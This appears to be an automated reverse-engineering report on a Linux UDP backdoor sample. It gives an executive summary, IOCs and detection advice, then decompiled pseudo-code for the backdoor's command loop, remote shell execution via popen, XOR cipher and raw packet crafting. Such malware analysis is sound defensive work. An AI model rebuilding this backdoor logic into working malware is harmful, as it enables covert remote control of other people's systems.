======================================================================
GHIDRA + RADARE2 BINARY ANALYSIS REPORT
======================================================================

SHA-256: 827f41fc1a6f8a4c8a8575b3e2349aeaba0dfc2c9390ef1cceeef1bb85c34161
Generated: 2026-02-10 07:11:13 UTC

----------------------------------------------------------------------
GHIDRA BINARY INFO
----------------------------------------------------------------------
Architecture: x86
Image Base:   00400000
Entry Points: 00601dc8, 004017a0, 00400aa0, 00401878, 00401216, 00401888, 0040163e, 00401890, 00601b38, 004017b0, 00601dd0, 004015ce, 00601dd4, 00601de8, 004010ce, 00601df8, 0040155e, 00601df0, 004016b8, 00400b78, 004008d0
Compiler:     ghidra.program.database.ProgramCompilerSpec@51d34f02
Imports:      <EXTERNAL>::__sysv_signal, <EXTERNAL>::printf, <EXTERNAL>::memset, <EXTERNAL>::puts, <EXTERNAL>::fseek, <EXTERNAL>::htons, <EXTERNAL>::exit, <EXTERNAL>::fopen, <EXTERNAL>::__libc_start_main, <EXTERNAL>::recv, <EXTERNAL>::setsockopt, <EXTERNAL>::pclose, <EXTERNAL>::sprintf, <EXTERNAL>::ntohs, <EXTERNAL>::fgetc, <EXTERNAL>::strerror, <EXTERNAL>::memcpy, <EXTERNAL>::socket, <EXTERNAL>::__errno_location, <EXTERNAL>::strcpy, <EXTERNAL>::fclose, <EXTERNAL>::fork, <EXTERNAL>::sendto, <EXTERNAL>::fwrite, <EXTERNAL>::perror, <EXTERNAL>::popen, <EXTERNAL>::__gmon_start__
Exports:      data_start, __libc_csu_fini, _start, _fini, sendResult2Peer, _IO_stdin_used, checksum, __dso_handle, __DTOR_END__, __libc_csu_init, initPz, myDecryptFun, __bss_start, file, remoteExec, _end, myEncryptFun, filesize, udp_tcp_checksum, main, _init
Functions:    70 (10 decompiled)

----------------------------------------------------------------------
RADARE2 BINARY INFO
----------------------------------------------------------------------
Architecture: x86
Bits:         64
OS:           linux
Endian:       little
Stripped:     False
Imports:      __sysv_signal, printf, memset, __gmon_start__, puts, fseek, htons, exit, fopen, __libc_start_main, recv, setsockopt, pclose, sprintf, ntohs, fgetc, strerror, memcpy, socket, __errno_location, strcpy, fclose, fork, sendto, fwrite, perror, popen
Exports:      __libc_csu_fini, _start, _fini, sendResult2Peer, _IO_stdin_used, __data_start, checksum, __dso_handle, __DTOR_END__, __libc_csu_init, initPz, myDecryptFun, __bss_start, file, remoteExec, _end, myEncryptFun, filesize, _edata, udp_tcp_checksum, main, _init
Functions:    42 (10 decompiled)

----------------------------------------------------------------------
EXECUTIVE SUMMARY
----------------------------------------------------------------------
### 1. Executive Summary
The analyzed binary is a Linux ELF 64-bit malware sample that functions as a UDP-based backdoor. Upon execution, it attempts to disguise its process name as `[syslog]` to blend in with legitimate system processes. It establishes a listening UDP socket to receive encrypted commands from a remote controller. The malware supports updating its encryption keys, writing file data to the local system (specifically to a file named `system.conf`), and likely executing remote shell commands via a `remoteExec` function. Communication is obfuscated using a simple XOR cipher and involves raw packet manipulation to calculate custom UDP checksums. Given its capabilities for remote command execution and file manipulation, the threat level is **High**.

### 2. Malware Capabilities
- **Process Masquerading**: Renames the running process to `[syslog]` to avoid detection in process lists.
- **C2 Communication**: Listens on a UDP socket (associated with magic port `0x84b`) for incoming packets.
- **Cryptographic Obfuscation**: Uses a 4-byte XOR key (`idkey`) to encrypt and decrypt command payloads.
- **File Operations**: Capable of writing received file chunks to `system.conf` on disk.
- **Remote Execution**: Contains a `remoteExec` function to run shell commands via `popen` and return the output to the C2 server.
- **Anti-Analysis/Debugging**: Ignores `SIGCHLD` (signal 17) signals to prevent zombie processes and handle child termination silently (common in forking shells).

### 3. Binary Information
| Property | Value |
|----------|-------|
| SHA256 | 827f41fc1a6f8a4c8a8575b3e2349aeaba0dfc2c9390ef1cceeef1bb85c34161 |
| Architecture | x86-64 |
| Type | ELF |
| Image Base | 0x00400000 |
| Entry Point | 0x00400b78 (entry0) |
| Compiler | GCC 4.1.2 20080704 (Red Hat 4.1.2-55) |
| Size | Unknown |
| Packing | Unpacked |

### 4. Technical Analysis

**Process Name Spoofing**
The `main` function checks if the argument count (`argc`) is greater than 8. If so, it overwrites `argv[0]` with the string "[syslog]" using hardcoded hex values (`0x7379735b`, `0x64676f6c`, `0x5d`). This technique hides the malware's true identity in tools like `top` or `ps`.

**C2 Communication & Protocol**
The malware creates a UDP socket (`socket(2,3,0x11)`). It enters a loop receiving data into a buffer. It validates packets by checking for a specific magic number `0x84b` (decimal 2123) and a hard-coded `idkey`. If valid, it decrypts the payload.

**Command Handling**
Based on the decompilation, the malware interprets command types located at offset `local_18[9]`:
- **Type 0x01**: Updates the `idkey` used for encryption.
- **Type 0x02**: Writes data to `system.conf`.

```c
// Ghidra Decompilation of Process Name Spoofing in main
if (8 < ~uVar10 - 1) {
    // ...
    puVar2 = (undefined4 *)*param_2;
    *puVar2 = 0x7379735b; // [sys
    puVar2[1] = 0x64676f6c; // logd
    *(undefined2 *)(puVar2 + 2) = 0x5d; // ]
}
```

**Cryptography**
The sample utilizes `myEncryptFun` and `myDecryptFun` to obfuscate traffic. These functions perform a byte-wise XOR operation on the payload using the global `idkey`.

```c
// Ghidra Decompilation of XOR Cipher (myEncryptFun / myDecryptFun)
for (local_c = 0; local_c < (int)(uint)param_4; local_c = local_c + 1) {
    if (param_2 <= local_d) {
        local_d = 0;
    }
    *(byte *)(local_c + param_5) =
         *(byte *)(local_c + param_3) ^ *(byte *)((ulong)local_d + param_1);
    local_d = local_d + 1;
}
```

### 5. Functions Analysis

**main @ 0x00400b78 (26 xrefs)**
- **Purpose**: Entry point and core command loop. Handles process spoofing, socket initialization, and packet reception.
- **Key Code**: Checks `argc` to spoof name. Sets `socket` options. Receives loop checking for magic bytes `0x84b` and validating `idkey`.
- **Security Note**: The use of `[syslog]` for process hiding is a clear indicator of malicious intent. The hardcoded check for magic number `0x84b` acts as a simple protocol signature.

**myDecryptFun @ 0x004015ce (2 xrefs)**
- **Purpose**: Decrypts incoming command payloads.
- **Key Code**: Loops through the buffer length performing XOR with the `idkey`.
- **Security Note**: XOR encryption is weak and easily reversible, allowing defenders to decode captured traffic if the key is known.

**myEncryptFun @ 0x0040155e (2 xrefs)**
- **Purpose**: Encrypts outgoing data (e.g., command results) before transmission.
- **Key Code**: Identical logic to `myDecryptFun` (XOR operation).
- **Security Note**: Used to obfuscate C2 responses.

**sendResult2Peer @ 0x00401216 (3 xrefs)**
- **Purpose**: Sends data back to the controller. It manually constructs packet headers and calculates UDP checksums.
- **Key Code**: Calls `udp_tcp_checksum` and `checksum`. Swaps source/destination ports/IPs in the packet structure. Encrypts payload via `myEncryptFun`.
- **Security Note**: The manual manipulation of packet headers suggests the malware might bypass standard stack handling or needs to craft specific raw packets (though `sendto` is used on a DGRAM socket).

**remoteExec @ 0x004010ce (1 xref)**
- **Purpose**: Executes shell commands on the host.
- **Key Code**: Uses `popen` to execute a command string passed in `param_1`. Reads the output via `fgetc` and stores it in a buffer. Appends error messages if execution fails.
- **Security Note**: Provides the attacker with full Remote Code Execution (RCE) capabilities on the infected host.

### 6. Operational Flow
1.  **Initialization**: The binary starts at `main`. It checks arguments and overwrites `argv[0]` with `[syslog]`. It sets a signal handler for `SIGCHLD` (signal 17) to ignore child signals.
2.  **Setup**: Creates a UDP socket (`socket(2,3,0x11)`). Sets socket options. Initializes buffers.
3.  **Main Operation**: Enters an infinite `recv` loop.
    - Receives data (max 2048 bytes).
    - Checks for Magic Header `0x84b`.
    - Validates the `idkey`.
    - Decrypts the command payload.
    - **Action**:
        - If Cmd Type `0x01`: Update `idkey`.
        - If Cmd Type `0x02`: Write data to `system.conf`.
        - Sends results back via `sendResult2Peer`.
4.  **Persistence**: No specific persistence mechanism (like systemd service or cron job) is visible in the provided code snippets, though the malware writes to `system.conf`, which could potentially be a configuration file for persistence or a dropped payload.

### 7. C2 & Networking
- **C2 Servers**: IP addresses are not hardcoded in the provided strings; the malware listens on a socket (binds implicitly or connects). The protocol uses a magic number `0x84b` (Port 2123).
- **Protocols**: UDP (Protocol 17).
- **Communication Pattern**:
    - **Inbound**: Encrypted (XOR) packets containing a Magic ID (`0x84b`), Session Key (`idkey`), Command Type, and Payload.
    - **Outbound**: Constructed UDP packets containing the response, encrypted with the session key, and including a custom checksum.

### 8. Evidence of Malicious Activity
1.  **Finding**: Process Masquerading - Evidence: Hex codes `0x7379735b` ("[sys"), `0x64676f6c` ("logd"), `0x5d` ("]") used to overwrite `argv[0]`.
2.  **Finding**: Cryptographic Obfuscation - Evidence: Functions `myEncryptFun` and `myDecryptFun` utilizing XOR logic on a global `idkey`.
3.  **Finding**: Remote Command Execution - Evidence: `remoteExec` function uses `popen` to execute strings and read output.
4.  **Finding**: Suspicious File Activity - Evidence: String `"system.conf"` and code opening this file with "w+" permissions in `main`.
5.  **Finding**: Backdoor Logic - Evidence: Magic number `0x84b` check and `idkey` validation in `main`.

### 9. Recommendations
1.  **Network Monitoring**: Monitor for UDP traffic on non-standard ports, specifically port 2123 (`0x84b`), and inspect for packets lacking standard protocol headers or containing the specific magic sequence.
2.  **Host-Based Detection**: Scan processes for instances where the process name claims to be `[syslog]` but the executable path or parent process hierarchy is suspicious.
3.  **File Integrity Monitoring**: Monitor for unauthorized creation or modification of `system.conf` in root directories or user home directories.
4.  **Signature Creation**: Create YARA rules matching the unique string combination of `"[syslog]"`, `"socket(): %s"`, and the specific function prologues for the XOR encryption routine.

### 10. IOCs (Indicators of Compromise)
- **File Hash**: 827f41fc1a6f8a4c8a8575b3e2349aeaba0dfc2c9390ef1cceeef1bb85c34161
- **Process Name**: [syslog] (Spoofed)
- **File Path**: system.conf (Dropped/Modified file)
- **Network Port**: 2123 (UDP) (Derived from magic bytes 0x84b)
- **Strings**: "server error: '%s' cannt execute", "idkey not correct", "receive %d, cmd type is %d and cmdl is %d"

### 11. Conclusion
The analyzed binary is a stealthy Linux backdoor capable of remote command execution and file manipulation. It employs process masquerading (`[syslog]`) and weak XOR encryption to hide its activity. The presence of `popen` and socket functionality indicates a functional C2 mechanism allowing attackers to control the infected host. Immediate remediation involves killing the spoofed process and blocking the associated UDP traffic.

----------------------------------------------------------------------
CALL GRAPH & ATTACK CHAINS
----------------------------------------------------------------------
Ghidra: nodes=17, edges=12, entries=12
  Entry points: __libc_csu_fini, __libc_csu_init, _fini, _init, _start, checksum, main, myDecryptFun, myEncryptFun, remoteExec
  Attack chains:
    - [Crypto] main -> myDecryptFun
    - [Crypto] sendResult2Peer -> myEncryptFun
    - [Network] main -> sendResult2Peer
    - [Crypto] main -> sendResult2Peer -> myEncryptFun

Radare2: nodes=42, edges=0, entries=2
  Entry points: entry0, main
  Attack chains: none detected

----------------------------------------------------------------------
APPENDIX A: GHIDRA DECOMPILED FUNCTIONS (10)
----------------------------------------------------------------------

--- FUN_004008e8 ---

void FUN_004008e8(void)

{
  (*(code *)PTR_00601cf0)();
  return;
}



--- main ---

void main(undefined8 param_1,undefined8 *param_2)

{
  char cVar1;
  undefined4 *puVar2;
  uint16_t uVar3;
  int iVar4;
  __pid_t _Var5;
  int *piVar6;
  char *pcVar7;
  ssize_t sVar8;
  long lVar9;
  ulong uVar10;
  undefined1 *puVar11;
  char local_e38 [1512];
  uint local_850;
  undefined4 local_84c;
  char local_848 [5];
  uint uStack_843;
  byte bStack_83f;
  ushort auStack_83e [5];
  undefined1 auStack_834 [2];
  uint16_t local_832;
  int local_40;
  uint local_3c;
  char *local_38;
  int local_2c;
  undefined1 *local_28;
  char *local_20;
  char *local_18;
  undefined2 local_e;
  uint local_c;
  
  local_40 = 0xffffffff;
  memset(local_848,0,0x800);
  uVar10 = 0xffffffffffffffff;
  pcVar7 = (char *)*param_2;
  do {
    if (uVar10 == 0) break;
    uVar10 = uVar10 - 1;
    cVar1 = *pcVar7;
    pcVar7 = pcVar7 + 1;
  } while (cVar1 != '\0');
  if (8 < ~uVar10 - 1) {
    uVar10 = 0xffffffffffffffff;
    pcVar7 = (char *)*param_2;
    do {
      if (uVar10 == 0) break;
      uVar10 = uVar10 - 1;
      cVar1 = *pcVar7;
      pcVar7 = pcVar7 + 1;
    } while (cVar1 != '\0');
    uVar10 = ~uVar10;
    puVar11 = (undefined1 *)*param_2;
    while (uVar10 = uVar10 - 1, uVar10 != 0) {
      *puVar11 = 0;
      puVar11 = puVar11 + 1;
    }
    puVar2 = (undefined4 *)*param_2;
    *puVar2 = 0x7379735b;
    puVar2[1] = 0x64676f6c;
    *(undefined2 *)(puVar2 + 2) = 0x5d;
  }
  __sysv_signal(0x11,(__sighandler_t)0x1);
  local_40 = socket(2,3,0x11);
  if (local_40 == -1) {
    piVar6 = __errno_location();
    pcVar7 = strerror(*piVar6);
    printf("socket(): %s\n",pcVar7);
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  local_84c = 1;
  iVar4 = setsockopt(local_40,0,3,&local_84c,4);
  if (iVar4 < 0) {
    puts("setsockopt error!");
  }
LAB_00400cd7:
  do {
    while( true ) {
      do {
        do {
          do {
            memset(local_848,0,0x800);
            sVar8 = recv(local_40,local_848,0x800,0);
            local_3c = (uint)sVar8;
          } while ((int)local_3c < 1);
          local_38 = local_848;
          local_2c = 0x14;
          local_28 = auStack_834;
          uVar3 = ntohs(local_832);
        } while (uVar3 != 0x84b);
        iVar4 = local_2c + 8;
        local_20 = local_848 + iVar4;
        local_2c = local_2c + 0x14;
      } while (local_848[(long)iVar4 + 1] != '\x01');
      lVar9 = (long)local_2c;
      local_18 = local_848 + lVar9;
      local_850 = *(uint *)((long)&uStack_843 + lVar9);
      if (local_850 == idkey) break;
      printf("idkey not correct,%d!=%d\n",(ulong)local_850,(ulong)idkey);
    }
    printf("receive %d, cmd type is %d and cmdl is %d\n",(ulong)local_3c,(ulong)(&bStack_83f)[lVar9]
           ,(ulong)*(ushort *)((long)auStack_83e + lVar9));
    myDecryptFun(&idkey,4,local_18 + 0xc,*(undefined2 *)(local_18 + 10),local_18 + 0xc);
    if (local_18[9] != '\0') {
      if (local_18[9] == '\x01') {
        idkey = *(uint *)(local_18 + 0xc);
        pcVar7 = local_e38;
        for (lVa

--- sendResult2Peer ---

void sendResult2Peer(int param_1,undefined1 *param_2,ushort param_3,undefined8 param_4,
                    ushort param_5)

{
  uint16_t uVar1;
  undefined2 uVar2;
  long lVar3;
  ulong uVar4;
  undefined1 *puVar5;
  sockaddr local_638;
  undefined1 local_628 [2];
  undefined2 local_626 [5];
  undefined4 local_61c;
  undefined4 local_618;
  int local_44;
  undefined1 *local_40;
  undefined2 *local_30;
  undefined2 local_22;
  undefined1 *local_20;
  undefined1 *local_18;
  uint16_t local_a;
  
  memset(local_628,0,0x5dc);
  local_44 = 0;
  if (param_3 < 0x5dc) {
    puVar5 = local_628;
    for (uVar4 = (ulong)param_3; uVar4 != 0; uVar4 = uVar4 - 1) {
      *puVar5 = *param_2;
      param_2 = param_2 + 1;
      puVar5 = puVar5 + 1;
    }
  }
  else {
    memcpy(local_628,param_2,0x5dc);
  }
  local_40 = local_628;
  local_61c = local_618;
  lVar3 = (long)(local_44 + 0x14);
  local_30 = (undefined2 *)(local_628 + lVar3);
  local_44 = local_44 + 0x1c;
  local_22 = *(undefined2 *)(local_628 + lVar3 + 2);
  *(undefined2 *)(local_628 + lVar3 + 2) = *local_30;
  *local_30 = local_22;
  local_20 = local_628 + local_44;
  local_628[(long)local_44 + 1] = 2;
  local_44 = local_44 + 0xc;
  local_18 = local_628 + local_44;
  *(undefined2 *)(local_628 + (long)local_44 + 1) = 2;
  if (param_5 < 0x4b0) {
    myEncryptFun(&idkey,4,param_4,param_5,local_18 + 0xc);
    uVar1 = htons(param_5 + 0x20);
    local_30[2] = uVar1;
    *(ushort *)(local_18 + 10) = param_5;
  }
  else {
    myEncryptFun(&idkey,4,param_4,0x4b0,local_18 + 0xc);
    uVar1 = htons(0x4d0);
    local_30[2] = uVar1;
    *(undefined2 *)(local_18 + 10) = 0x4b0;
  }
  uVar1 = htons(*(short *)(local_18 + 10) + 0x10);
  *(uint16_t *)(local_20 + 2) = uVar1;
  *(short *)(local_18 + 1) = *(short *)(local_18 + 1) + *(short *)(local_18 + 10) + 7;
  uVar1 = htons(*(uint16_t *)(local_18 + 1));
  *(uint16_t *)(local_18 + 1) = uVar1;
  local_a = ntohs(local_30[2]);
  local_30[3] = 0;
  uVar2 = udp_tcp_checksum(0x11,*(undefined4 *)(local_40 + 0xc),*(undefined4 *)(local_40 + 0x10),
                           local_30,local_a);
  local_30[3] = uVar2;
  local_40[6] = local_40[6] | 0x40;
  uVar1 = htons(local_a + 0x14);
  *(uint16_t *)(local_40 + 2) = uVar1;
  *(undefined2 *)(local_40 + 10) = 0;
  uVar2 = checksum(local_628,local_a + 0x14);
  *(undefined2 *)(local_40 + 10) = uVar2;
  local_638.sa_data._2_4_ = *(undefined4 *)(local_40 + 0x10);
  local_638.sa_family = 2;
  local_638.sa_data._0_2_ = local_30[1];
  sendto(param_1,local_628,(ulong)local_a + 0x14,0,&local_638,0x10);
  return;
}



--- remoteExec ---

ushort remoteExec(char *param_1,char *param_2)

{
  char cVar1;
  int iVar2;
  char *pcVar3;
  FILE *pFVar4;
  ulong uVar5;
  long lVar6;
  ushort local_c;
  
  strcpy(param_2,param_1);
  uVar5 = 0xffffffffffffffff;
  pcVar3 = param_2;
  do {
    if (uVar5 == 0) break;
    uVar5 = uVar5 - 1;
    cVar1 = *pcVar3;
    pcVar3 = pcVar3 + 1;
  } while (cVar1 != '\0');
  pcVar3 = param_2 + (~uVar5 - 1);
  pcVar3[0] = '\n';
  pcVar3[1] = ' ';
  pcVar3[2] = '\0';
  lVar6 = -1;
  pcVar3 = param_2;
  do {
    if (lVar6 == 0) break;
    lVar6 = lVar6 + -1;
    cVar1 = *pcVar3;
    pcVar3 = pcVar3 + 1;
  } while (cVar1 != '\0');
  local_c = ~(ushort)lVar6 - 1;
  pFVar4 = popen(param_1,"r");
  pFVar4 = (FILE *)(long)(int)pFVar4;
  if (pFVar4 == (FILE *)0x0) {
    perror(param_1);
    pclose((FILE *)0x0);
    sprintf(param_2 + local_c,"server error: \'%s\' cannt execute\n",param_1);
    lVar6 = -1;
    do {
      if (lVar6 == 0) break;
      lVar6 = lVar6 + -1;
      cVar1 = *param_2;
      param_2 = param_2 + 1;
    } while (cVar1 != '\0');
    local_c = ~(ushort)lVar6 - 1;
  }
  else {
    for (; local_c < 0x4b0; local_c = local_c + 1) {
      iVar2 = fgetc(pFVar4);
      if ((char)iVar2 == -1) break;
      param_2[local_c] = (char)iVar2;
    }
    pclose(pFVar4);
  }
  return local_c;
}



--- udp_tcp_checksum ---

undefined2
udp_tcp_checksum(undefined1 param_1,undefined4 param_2,undefined4 param_3,undefined1 *param_4,
                uint16_t param_5)

{
  undefined2 uVar1;
  ulong uVar2;
  undefined4 *puVar3;
  undefined1 *puVar4;
  undefined1 local_608 [1504];
  undefined4 local_28;
  undefined4 local_24;
  undefined1 local_20;
  undefined1 local_1f;
  uint16_t local_1e;
  ushort local_e;
  int local_c;
  
  local_e = 0xc;
  local_20 = 0;
  local_28 = param_3;
  local_24 = param_2;
  local_1f = param_1;
  local_1e = htons(param_5);
  local_c = (uint)local_e + (uint)param_5;
  memset(local_608,0,0x5dc);
  puVar3 = &local_28;
  puVar4 = local_608;
  for (uVar2 = (ulong)local_e; uVar2 != 0; uVar2 = uVar2 - 1) {
    *puVar4 = *(undefined1 *)puVar3;
    puVar3 = (undefined4 *)((long)puVar3 + 1);
    puVar4 = puVar4 + 1;
  }
  puVar4 = local_608 + local_e;
  for (uVar2 = (ulong)param_5; uVar2 != 0; uVar2 = uVar2 - 1) {
    *puVar4 = *param_4;
    param_4 = param_4 + 1;
    puVar4 = puVar4 + 1;
  }
  uVar1 = checksum(local_608,local_c);
  return uVar1;
}



--- checksum ---

uint checksum(ushort *param_1,int param_2)

{
  long lVar1;
  int local_24;
  ushort *local_20;
  ulong local_10;
  
  local_10 = 0;
  local_20 = param_1;
  for (local_24 = param_2; 1 < local_24; local_24 = local_24 + -2) {
    local_10 = local_10 + *local_20;
    local_20 = local_20 + 1;
  }
  if (local_24 != 0) {
    local_10 = local_10 + (byte)*local_20;
  }
  lVar1 = (local_10 >> 0x10) + (local_10 & 0xffff);
  return ~((int)lVar1 + (int)((ulong)lVar1 >> 0x10)) & 0xffff;
}



--- myEncryptFun ---

ushort myEncryptFun(long param_1,byte param_2,long param_3,ushort param_4,long param_5)

{
  undefined1 local_d;
  undefined4 local_c;
  
  local_d = 0;
  for (local_c = 0; local_c < (int)(uint)param_4; local_c = local_c + 1) {
    if (param_2 <= local_d) {
      local_d = 0;
    }
    *(byte *)(local_c + param_5) =
         *(byte *)(local_c + param_3) ^ *(byte *)((ulong)local_d + param_1);
    local_d = local_d + 1;
  }
  return param_4;
}



--- myDecryptFun ---

ushort myDecryptFun(long param_1,byte param_2,long param_3,ushort param_4,long param_5)

{
  undefined1 local_d;
  undefined4 local_c;
  
  local_d = 0;
  for (local_c = 0; local_c < (int)(uint)param_4; local_c = local_c + 1) {
    if (param_2 <= local_d) {
      local_d = 0;
    }
    *(byte *)(local_c + param_5) =
         *(byte *)(local_c + param_3) ^ *(byte *)((ulong)local_d + param_1);
    local_d = local_d + 1;
  }
  return param_4;
}



--- __do_global_dtors_aux ---

/* WARNING: Removing unreachable block (ram,0x00400b21) */

void __do_global_dtors_aux(void)

{
  if (completed_6145 == '\0') {
    completed_6145 = '\x01';
  }
  return;
}



--- __do_global_ctors_aux ---

void __do_global_ctors_aux(void)

{
  code *pcVar1;
  undefined8 *puVar2;
  
  puVar2 = &__CTOR_LIST__;
  pcVar1 = __CTOR_LIST__;
  while (pcVar1 != (code *)0xffffffffffffffff) {
    puVar2 = puVar2 + -1;
    (*pcVar1)();
    pcVar1 = (code *)*puVar2;
  }
  return;
}



----------------------------------------------------------------------
APPENDIX B: RADARE2 DECOMPILED FUNCTIONS (10)
----------------------------------------------------------------------

--- main ---
/* r2dec pseudo code output (r2 6.0.8) */
/* /data/shared/dbus-echo @ 0x400b78 */
#include <stdint.h>
 
int32_t main (int32_t argc, char ** argv) {
    int64_t var_e60h;
    int64_t var_e58h;
    int64_t var_e50h;
    int64_t var_e48h;
    char ** var_e40h;
    int64_t var_e34h;
    char  s;
    int64_t var_848h;
    void  optval;
    void  buffer;
    uint32_t socket;
    ssize_t var_34h;
    int64_t var_30h;
    int64_t var_24h;
    int64_t var_20h;
    int64_t var_18h;
    void * ptr;
    int64_t var_6h;
    int64_t var_4h;
    rdi = argc;
    rsi = argv;
    *((rbp - 0xe34)) = edi;
    *((rbp - 0xe40)) = rsi;
    *((rbp - 0x38)) = 0xffffffff;
    memset (rbp - 0x840, 0, 0x800);
    rax = *((rbp - 0xe40));
    rax = *(rax);
    rcx = 0xffffffffffffffff;
    *((rbp - 0xe48)) = rax;
    eax = 0;
    rdi = *((rbp - 0xe48));
    __asm ("repne scasb al, byte [rdi]");
    rax = rcx;
    rax = ~rax;
    rax--;
    if (rax <= 8) {
        goto label_1;
    }
    rax = *((rbp - 0xe40));
    rax = *(rax);
    rcx = 0xffffffffffffffff;
    *((rbp - 0xe50)) = rax;
    eax = 0;
    rdi = *((rbp - 0xe50));
    __asm ("repne scasb al, byte [rdi]");
    rax = rcx;
    rax = ~rax;
    rdx = rax - 1;
    rax = *((rbp - 0xe40));
    rax = *(rax);
    rdi = *(rax);
    rcx = rdx;
    eax = 0;
    do {
        *(rdi) = al;
        rcx--;
        rdi++;
    } while (rcx != 0);
    rax = *((rbp - 0xe40));
    rax = *(rax);
    *(rax) = 0x7379735b;
    *((rax + 4)) = 0x64676f6c;
    *((rax + 8)) = 0x5d;
label_1:
    esi = 1;
    edi = 0x11;
    sysv_signal ();
    eax = socket (2, 3, 0x11);
    *((rbp - 0x38)) = eax;
    if (*((rbp - 0x38)) == 0xffffffff) {
        rax = errno_location ();
        rax = strerror (*(rax));
        rsi = rax;
        eax = 0;
        printf ("socket(): %s\n");
        exit (1);
    }
    *((rbp - 0x844)) = 1;
    eax = setsockopt (*((rbp - 0x38)), 0, 3, rbp - 0x844, 4);
    if (eax >= 0) {
        goto label_0;
    }
    puts ("setsockopt error!");
    while (*((rbp - 0x34)) <= 0) {
label_0:
        rax = rbp - 0x840;
        memset (rax, 0, 0x800);
        ecx = 0;
        edx = 0x800;
        eax = recv (*((rbp - 0x38)), rbp - 0x840);
        *((rbp - 0x34)) = eax;
    }
    rax = rbp - 0x840;
    *((rbp - 0x30)) = rax;
    *((rbp - 0x24)) = 0x14;
    eax = *((rbp - 0x24));
    rax = (int64_t) eax;
    rdx = rax;
    rax = rbp - 0x840;
    rax += rdx;
    *((rbp - 0x20)) = rax;
    rax = *((rbp - 0x20));
    eax = *((rax + 2));
    edi = (int32_t) ax;
    ax = ntohs ();
    if (ax != 0x84b) {
        goto label_0;
    }
    eax = *((rbp - 0x24));
    eax += 8;
    *((rbp - 0x24)) = eax;
    eax = *((rbp - 0x24));
    rax = (int64_t) eax;
    rdx = rax;
    rax = rbp - 0x840;
    rax += rdx;
    *((rbp - 0x18)) = rax;
    eax = *((rbp - 0x24));
    eax += 0xc;
    *((rbp - 0x24)) = eax;
    rax = *((rbp - 0x18));
    eax = *((rax + 1));
    if (al != 1) {
        goto label_0;
    }
    eax = *((rbp - 0x24));
    rax = (int64_t) eax;


--- sym.sendResult2Peer ---
/* r2dec pseudo code output (r2 6.0.8) */
/* /data/shared/dbus-echo @ 0x401216 */
#include <stdint.h>
 
uint64_t sendResult2Peer (uint32_t arg1, size_t arg2, char  arg3, int64_t arg4) {
    uint32_t var_654h;
    char  var_650h;
    uint32_t var_644h;
    size_t s2;
    uint32_t var_634h;
    int64_t var_630h;
    int64_t var_62eh;
    int64_t var_62ch;
    void * s1;
    int64_t var_3ch;
    int64_t var_38h;
    int64_t var_2ch;
    int64_t var_28h;
    int64_t var_1ah;
    int64_t var_18h;
    int64_t var_10h;
    int64_t var_2h;
    rdi = arg1;
    rsi = arg2;
    rcx = arg3;
    r8 = arg4;
    *((rbp - 0x634)) = edi;
    *((rbp - 0x640)) = rsi;
    *((rbp - 0x650)) = rcx;
    eax = r8d;
    *((rbp - 0x644)) = dx;
    *((rbp - 0x654)) = ax;
    memset (rbp - 0x620, 0, 0x5dc);
    *((rbp - 0x3c)) = 0;
    if (*((rbp - 0x644)) > 0x5db) {
        goto label_0;
    }
    ecx = *((rbp - 0x644));
    rax = rbp - 0x620;
    rdx = *((rbp - 0x640));
    rdi = rax;
    rsi = rdx;
    do {
        *(rdi) = *(rsi);
        rcx--;
        rsi++;
        rdi++;
    } while (rcx != 0);
    goto label_1;
label_0:
    rax = rbp - 0x620;
    rdx = *((rbp - 0x640));
    memcpy (rax, rdx, 0x5dc);
label_1:
    rax = rbp - 0x620;
    *((rbp - 0x38)) = rax;
    rax = *((rbp - 0x38));
    eax = *((rax + 0xc));
    *((rbp - 0x2c)) = eax;
    rax = *((rbp - 0x38));
    edx = *((rax + 0x10));
    rax = *((rbp - 0x38));
    *((rax + 0xc)) = edx;
    rdx = *((rbp - 0x38));
    eax = *((rbp - 0x2c));
    *((rdx + 0x10)) = eax;
    eax = *((rbp - 0x3c));
    eax += 0x14;
    *((rbp - 0x3c)) = eax;
    eax = *((rbp - 0x3c));
    rax = (int64_t) eax;
    rdx = rax;
    rax = rbp - 0x620;
    rax += rdx;
    *((rbp - 0x28)) = rax;
    eax = *((rbp - 0x3c));
    eax += 8;
    *((rbp - 0x3c)) = eax;
    rax = *((rbp - 0x28));
    eax = *((rax + 2));
    *((rbp - 0x1a)) = ax;
    rax = *((rbp - 0x28));
    edx = *(rax);
    rax = *((rbp - 0x28));
    *((rax + 2)) = dx;
    rdx = *((rbp - 0x28));
    eax = *((rbp - 0x1a));
    *(rdx) = ax;
    eax = *((rbp - 0x3c));
    rax = (int64_t) eax;
    rdx = rax;
    rax = rbp - 0x620;
    rax += rdx;
    *((rbp - 0x18)) = rax;
    rax = *((rbp - 0x18));
    *((rax + 1)) = 2;
    eax = *((rbp - 0x3c));
    eax += 0xc;
    *((rbp - 0x3c)) = eax;
    eax = *((rbp - 0x3c));
    rax = (int64_t) eax;
    rdx = rax;
    rax = rbp - 0x620;
    rax += rdx;
    *((rbp - 0x10)) = rax;
    rax = *((rbp - 0x10));
    *((rax + 1)) = 2;
    if (*((rbp - 0x654)) > 0x4af) {
        rax = *((rbp - 0x10));
        rax += 0xc;
        edi = obj.idkey;
        rdx = *((rbp - 0x650));
        r8 = rax;
        ecx = 0x4b0;
        esi = 4;
        myEncryptFun ();
        edi = 0x4d0;
        eax = htons ();
        edx = eax;
        rax = *((rbp - 0x28));
        *((rax + 4)) = dx;
        rax = *((rbp - 0x10));
        *((rax + 0xa)) = 0x4b0;
    } else {
        rax = *((rbp - 0x10));
        rax += 0xc;
        ecx = *((rbp - 0x654));
        edi = obj.i

--- sym.remoteExec ---
/* r2dec pseudo code output (r2 6.0.8) */
/* /data/shared/dbus-echo @ 0x4010ce */
#include <stdint.h>
 
int64_t remoteExec (char * arg1, char  arg2) {
    int64_t var_40h;
    char * var_38h;
    char * var_30h;
    uint32_t var_24h;
    char  dest;
    char * filename;
    file* stream;
    uint32_t var_4h;
    uint32_t var_1h;
    rdi = arg1;
    rsi = arg2;
    *((rbp - 0x18)) = rdi;
    *((rbp - 0x20)) = rsi;
    strcpy (*((rbp - 0x20)), *((rbp - 0x18)));
    rax = *((rbp - 0x20));
    rcx = 0xffffffffffffffff;
    *((rbp - 0x30)) = rax;
    eax = 0;
    rdi = *((rbp - 0x30));
    __asm ("repne scasb al, byte [rdi]");
    rax = rcx;
    rax = ~rax;
    rax--;
    rax += *((rbp - 0x20));
    *(rax) = 0x200a;
    *((rax + 2)) = 0;
    rax = *((rbp - 0x20));
